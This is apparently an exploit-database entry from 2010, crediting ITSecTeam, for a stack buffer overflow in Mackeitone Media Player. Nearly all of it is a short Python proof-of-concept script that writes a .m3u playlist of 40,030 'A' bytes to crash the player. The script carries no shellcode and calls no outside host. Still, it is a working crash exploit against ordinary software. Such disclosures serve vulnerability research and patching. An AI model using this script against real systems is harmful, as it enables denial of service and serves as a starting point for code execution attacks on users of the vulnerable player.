Mackeitone Media Player – ‘.m3u’ Stack Buffer Overflow

  • 作者: ITSecTeam
    日期: 2010-03-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11714/
  • #!/usr/bin/python
    #
    # #############################################################################
    # Mackeitone Media Player (.m3u file) stack buffer Overflow 
    # download link: http://www.makeitone.net/downloads/MakeitOne-MediaPlayerv1.00.exe
    # Tested in : Windows XP SP3
    # Credit : ItSecTeam
    # mail : Bug@ItSecTeam.com
    # Web:WwW.ITSecTeam.com
    # Find by: PLATEN @ ItSecTeam
    # Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder 
    #Usage: ./MAckeitone-poc.py
    # #############################################################################
    #
    print """
    [~] Mackeitone Media Player (.m3u file) stackOverflowpoc
    [~] mail : Bug@ItSecTeam.com
    [~] Web:WwW.ITSecTeam.com
    [~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam 
    """
    
    data= "\x41" *40030
    try:
    	file=open("media-poc.m3u",'w')
    	file.write( data )
    	file.close()
    	print ("[+] File created successfully: media-poc.m3u" )
    except:
    	print "[-] Error cant write file to system\n"